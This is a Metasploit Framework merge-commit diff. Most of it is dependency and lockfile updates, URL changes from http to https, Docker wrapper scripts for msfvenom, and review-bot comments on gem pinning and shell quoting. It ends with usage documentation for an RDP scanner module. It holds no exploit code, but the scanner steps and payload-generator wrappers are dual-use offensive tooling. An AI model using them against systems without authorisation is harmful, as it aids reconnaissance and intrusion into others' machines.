Merge branch 'master' of https://github.com/rapid7/metasploit-framework into feature/linux_reverse_tcp_x64_retry

bug/bundler_fix
tkmru 2017-07-26 09:48:17 +09:00
commit eb536ba67c
3474 changed files with 6912 additions and 8585 deletions


@ -90,7 +90,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for

2
.gitignore vendored

@ -78,7 +78,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for


@ -14,6 +14,22 @@ Metrics/ClassLength:
Exclude: Exclude:
- 'modules/**/*' - 'modules/**/*'
Metrics/AbcSize:
Enabled: false
Description: 'This is often a red-herring'
Metrics/CyclomaticComplexity:
Enabled: false
Description: 'This is often a red-herring'
Metrics/PerceivedComplexity:
Enabled: false
Description: 'This is often a red-herring'
Style/FrozenStringLiteralComment:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/Documentation: Style/Documentation:
Enabled: true Enabled: true
Description: 'Most Metasploit modules do not have class documentation.' Description: 'Most Metasploit modules do not have class documentation.'


@ -16,8 +16,6 @@ rvm:
- '2.4.1' - '2.4.1'
env: env:
# TODO: restore these tests when the code passes them!
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'

16
Gemfile

@ -3,6 +3,14 @@ source 'https://rubygems.org'
# spec.add_runtime_dependency '<name>', [<version requirements>] # spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec name: 'metasploit-framework' gemspec name: 'metasploit-framework'
# These pull in pre-release gems in order to fix specific issues.
# XXX https://github.com/alexdalitz/dnsruby/pull/134
gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'
# XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970
gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if [
'x86_64-linux', 'x86-linux', 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
# separate from test as simplecov is not run on travis-ci # separate from test as simplecov is not run on travis-ci
group :coverage do group :coverage do
# code coverage for tests # code coverage for tests
@ -37,14 +45,6 @@ group :development, :test do
end end
group :test do group :test do
# cucumber extension for testing command line applications, like msfconsole
gem 'aruba'
# cucumber + automatic database cleaning with database_cleaner
gem 'cucumber-rails', :require => false
gem 'shoulda-matchers'
# Manipulate Time.now in specs # Manipulate Time.now in specs
gem 'timecop' gem 'timecop'
# Needed to work around a regression between capybara 2.7.1 and xpath 2.1
# XXX remove when capybara is updated to work with xpath 2.1
gem 'xpath', '2.0'
end end
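Review bot: The new `gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'` and `gem 'rb-readline', git: ...` lines in the first hunk name a repository but no `ref:`, so the Gemfile itself tracks whatever the upstream default branch of a third-party fork points at and only Gemfile.lock holds the revision; a later `bundle update` or lockfile regeneration would silently pull in newer commits from those forks. Since the XXX comments show these are deliberate pins to a specific PR and commit, pin them in the Gemfile as well: `gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby', ref: '09c3890ccfaedb7fd4951f56575d5c53651e0140'` and `gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline', ref: 'fd882edcd145c26681f9971be5f6675c7f6d1970'`, matching the revisions recorded in the Gemfile.lock section of this commit. The `RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin')` guard on the rb-readline line looks correct for the three listed platforms.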


@ -1,7 +1,19 @@
GIT
remote: https://github.com/ConnorAtherton/rb-readline
revision: fd882edcd145c26681f9971be5f6675c7f6d1970
specs:
rb-readline (0.5.4)
GIT
remote: https://github.com/alexdalitz/dnsruby
revision: 09c3890ccfaedb7fd4951f56575d5c53651e0140
specs:
dnsruby (1.60.1)
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.15.1) metasploit-framework (4.15.4)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -16,9 +28,9 @@ PATH
metasploit-concern metasploit-concern
metasploit-credential metasploit-credential
metasploit-model metasploit-model
metasploit-payloads (= 1.2.37) metasploit-payloads (= 1.2.44)
metasploit_data_models metasploit_data_models
metasploit_payloads-mettle (= 0.1.10) metasploit_payloads-mettle (= 0.1.14)
msgpack msgpack
nessus_rest nessus_rest
net-ssh net-ssh
@ -46,7 +58,7 @@ PATH
rex-mime rex-mime
rex-nop rex-nop
rex-ole rex-ole
rex-powershell rex-powershell (< 0.1.73)
rex-random_identifier rex-random_identifier
rex-registry rex-registry
rex-rop_builder rex-rop_builder
@ -102,48 +114,13 @@ GEM
arel (6.0.4) arel (6.0.4)
arel-helpers (2.4.0) arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6) activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0) backports (3.8.0)
bcrypt (3.1.11) bcrypt (3.1.11)
bindata (2.4.0) bindata (2.4.0)
bit-struct (0.16) bit-struct (0.16)
builder (3.2.3) builder (3.2.3)
capybara (2.14.4)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1) coderay (1.1.1)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
diff-lcs (1.3) diff-lcs (1.3)
dnsruby (1.60.1)
docile (1.1.5) docile (1.1.5)
erubis (2.7.0) erubis (2.7.0)
factory_girl (4.8.0) factory_girl (4.8.0)
@ -151,15 +128,13 @@ GEM
factory_girl_rails (4.8.0) factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0) factory_girl (~> 4.8.0)
railties (>= 3.0.0) railties (>= 3.0.0)
faraday (0.12.1) faraday (0.12.2)
multipart-post (>= 1.2, < 3) multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1) filesize (0.1.1)
fivemat (1.3.5) fivemat (1.3.5)
gherkin (4.1.3)
google-protobuf (3.3.0) google-protobuf (3.3.0)
googleauth (0.5.1) googleauth (0.5.2)
faraday (~> 0.9) faraday (~> 0.12)
jwt (~> 1.4) jwt (~> 1.4)
logging (~> 2.0) logging (~> 2.0)
memoist (~> 0.12) memoist (~> 0.12)
@ -203,7 +178,7 @@ GEM
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-payloads (1.2.37) metasploit-payloads (1.2.44)
metasploit_data_models (2.0.15) metasploit_data_models (2.0.15)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -214,16 +189,12 @@ GEM
postgres_ext postgres_ext
railties (~> 4.2.6) railties (~> 4.2.6)
recog (~> 2.0) recog (~> 2.0)
metasploit_payloads-mettle (0.1.10) metasploit_payloads-mettle (0.1.14)
method_source (0.8.2) method_source (0.8.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
mini_portile2 (2.2.0) mini_portile2 (2.2.0)
minitest (5.10.2) minitest (5.10.3)
msgpack (1.1.0) msgpack (1.1.0)
multi_json (1.12.1) multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0) multipart-post (2.0.0)
nessus_rest (0.1.6) nessus_rest (0.1.6)
net-ssh (4.1.0) net-ssh (4.1.0)
@ -274,7 +245,6 @@ GEM
rake (>= 0.8.7) rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0) thor (>= 0.18.1, < 2.0)
rake (12.0.0) rake (12.0.0)
rb-readline (0.5.4)
recog (2.1.11) recog (2.1.11)
nokogiri nokogiri
redcarpet (3.4.0) redcarpet (3.4.0)
@ -286,7 +256,7 @@ GEM
rex-core rex-core
rex-struct2 rex-struct2
rex-text rex-text
rex-core (0.1.11) rex-core (0.1.12)
rex-encoder (0.1.4) rex-encoder (0.1.4)
metasm metasm
rex-arch rex-arch
@ -358,8 +328,6 @@ GEM
sawyer (0.8.1) sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6) addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0) faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.2)
activesupport (>= 4.0.0)
signet (0.7.3) signet (0.7.3)
addressable (~> 2.3) addressable (~> 2.3)
faraday (~> 0.9) faraday (~> 0.9)
@ -386,16 +354,13 @@ GEM
activemodel (>= 4.2.7) activemodel (>= 4.2.7)
activesupport (>= 4.2.7) activesupport (>= 4.2.7)
xmlrpc (0.3.0) xmlrpc (0.3.0)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.9.9) yard (0.9.9)
PLATFORMS PLATFORMS
ruby ruby
DEPENDENCIES DEPENDENCIES
aruba dnsruby!
cucumber-rails
factory_girl_rails factory_girl_rails
fivemat fivemat
metasploit-aggregator metasploit-aggregator
@ -403,14 +368,13 @@ DEPENDENCIES
octokit octokit
pry pry
rake rake
rb-readline!
redcarpet redcarpet
rspec-rails rspec-rails
rspec-rerun rspec-rerun
shoulda-matchers
simplecov simplecov
timecop timecop
xpath (= 2.0)
yard yard
BUNDLED WITH BUNDLED WITH
1.15.1 1.15.3


@ -1,71 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT Ascii85, 1.0.2, MIT
actionview, 4.2.8, MIT actionpack, 4.2.9, MIT
activemodel, 4.2.8, MIT actionview, 4.2.9, MIT
activerecord, 4.2.8, MIT activemodel, 4.2.9, MIT
activesupport, 4.2.8, MIT activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0" addressable, 2.5.1, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby bindata, 2.4.0, ruby
bit-struct, 0.16, ruby bit-struct, 0.16, ruby
builder, 3.2.3, MIT builder, 3.2.3, MIT
bundler, 1.15.0, MIT bundler, 1.15.1, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT coderay, 1.1.1, MIT
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+" diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT docile, 1.1.5, MIT
erubis, 2.7.0, MIT erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT fivemat, 1.3.5, MIT
gherkin, 4.1.3, MIT
google-protobuf, 3.3.0, "New BSD" google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0" googleauth, 0.5.1, "Apache 2.0"
grpc, 1.3.4, "New BSD" grpc, 1.4.1, "New BSD"
i18n, 0.8.1, MIT hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
jsobfu, 0.4.2, "New BSD" jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby json, 2.1.0, ruby
jwt, 1.5.6, MIT jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT logging, 2.2.2, MIT
loofah, 2.0.3, MIT loofah, 2.0.3, MIT
memoist, 0.15.0, MIT memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD" metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD" metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.9, "New BSD" metasploit-credential, 2.0.10, "New BSD"
metasploit-framework, 4.14.23, "New BSD" metasploit-framework, 4.15.0, "New BSD"
metasploit-model, 2.0.4, "New BSD" metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD" metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD" metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD" metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT method_source, 0.8.2, MIT
mime-types, 3.1, MIT mini_portile2, 2.2.0, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
minitest, 5.10.2, MIT minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0" msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD nexpose, 6.1.0, BSD
nokogiri, 1.7.2, MIT nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT openvas-omp, 0.0.4, MIT
@ -73,6 +64,7 @@ os, 0.9.6, MIT
packetfu, 1.1.13, BSD packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD" patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1 pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pg, 0.20.0, "New BSD" pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT postgres_ext, 3.0.0, MIT
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT railties, 4.2.9, MIT
rake, 12.0.0, MIT rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD rb-readline, 0.5.4, BSD
recog, 2.1.8, unknown recog, 2.1.11, unknown
redcarpet, 3.4.0, MIT redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD" rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.3, "New BSD" rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.10, "New BSD" rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD" rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD" rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD" rex-java, 0.1.5, "New BSD"
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD" rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD" rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD" rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD" rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD" rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD" rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD" rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD" rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT rspec-rails, 3.6.0, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD" ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD" rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0" signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT simplecov-html, 0.10.1, MIT
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT sshkey, 1.9.0, MIT
thor, 0.19.4, MIT thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0" thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.2, BSD windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT yard, 0.9.9, MIT


@ -14,8 +14,7 @@ New bugs and feature requests should be directed to:
API documentation for writing modules can be found at: API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing Installing
-- --


@ -15,5 +15,5 @@
| %bld[ OK ]%clr | | %bld[ OK ]%clr |
|______________________________________________________________________________| |______________________________________________________________________________|
| | | |
| http://metasploit.com | | https://metasploit.com |
|______________________________________________________________________________|%clr |______________________________________________________________________________|%clr


@ -18,4 +18,4 @@
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr %bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr %bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.com %clr%bld https://metasploit.com


@ -27,4 +27,4 @@
################################################################################ ################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################ ################################################################################
http://metasploit.com%clr https://metasploit.com%clr


@ -27,4 +27,4 @@
# # ### # # ## # # ### # # ##
######################## ########################
## ## ## ## ## ## ## ##
http://metasploit.com%clr https://metasploit.com%clr


@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%% %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


@ -23,4 +23,4 @@
; ,''-,;' ``- ; ,''-,;' ``-
``-..__``--` ``-..__``--`
http://metasploit.com%clr https://metasploit.com%clr


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -188,7 +188,7 @@
</div> </div>
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>
</html> </html>


@ -195,7 +195,7 @@
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>


@ -24,7 +24,6 @@ RUN apk update && \
bison \ bison \
build-base \ build-base \
ruby-dev \ ruby-dev \
libffi-dev\
openssl-dev \ openssl-dev \
readline-dev \ readline-dev \
sqlite-dev \ sqlite-dev \
@ -35,6 +34,7 @@ RUN apk update && \
yaml-dev \ yaml-dev \
zlib-dev \ zlib-dev \
ncurses-dev \ ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install --system $BUNDLER_ARGS \ && bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \ && apk del .ruby-builddeps \


@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path)) MSF_PATH=$(dirname $(dirname $path))
fi fi
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
cd $MSF_PATH cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@" docker-compose run --rm --service-ports ms ./msfvenom "$@"
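Review bot: The added `docker-compose -f $MSF_PATH/docker-compose.yml build` leaves `$MSF_PATH` unquoted, as does the existing `cd $MSF_PATH` right below it, so a checkout path containing whitespace is split into several arguments, and a failed `cd` is not checked before `docker-compose run` executes from the wrong directory; the same pattern appears in the new docker/bin/msfvenom-dev. Quote the expansions and stop on a failed `cd`: `docker-compose -f "$MSF_PATH/docker-compose.yml" build` and `cd "$MSF_PATH" || exit 1`. The enclosing `if [[ -z "$MSF_PATH" ]]` block begins before this hunk.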

26
docker/bin/msfvenom-dev Executable file

@ -0,0 +1,26 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"
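Review bot: The two `-f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml` argument lists on the `build` and `run` lines are duplicated verbatim, so a future change to the override file set has to be made twice, and both lines leave `$MSF_PATH` unquoted. Build the shared arguments once in an array and reuse it: `compose=(docker-compose -f "$MSF_PATH/docker-compose.yml" -f "$MSF_PATH/docker/docker-compose.development.override.yml")`, then `[[ -n "$MSF_BUILD" ]] && "${compose[@]}" build` and `"${compose[@]}" run --rm --service-ports ms ./msfvenom "$@"`. The earlier `cd $MSF_PATH` would likewise benefit from `cd "$MSF_PATH" || exit 1`, in line with the error handling the script already does for a missing `realpath`.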


@ -0,0 +1,66 @@
## Vulnerable Application
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
## Verification Steps
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
3. Do: ```run```
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
## Options
There are three options currently supported that control what security protocols to
send in the RDP negotiation request, which can be helpful in identifying RDP
endpoints that might be locked down or configured differently:
**TLS** Set to true to request TLS security support
**CredSSP** Set to true to request CredSSP support
**EarlyUser** Set to true to request Early User Authorization Result PDU support
## Scenarios
```
msf auxiliary(rdp_scanner) > run
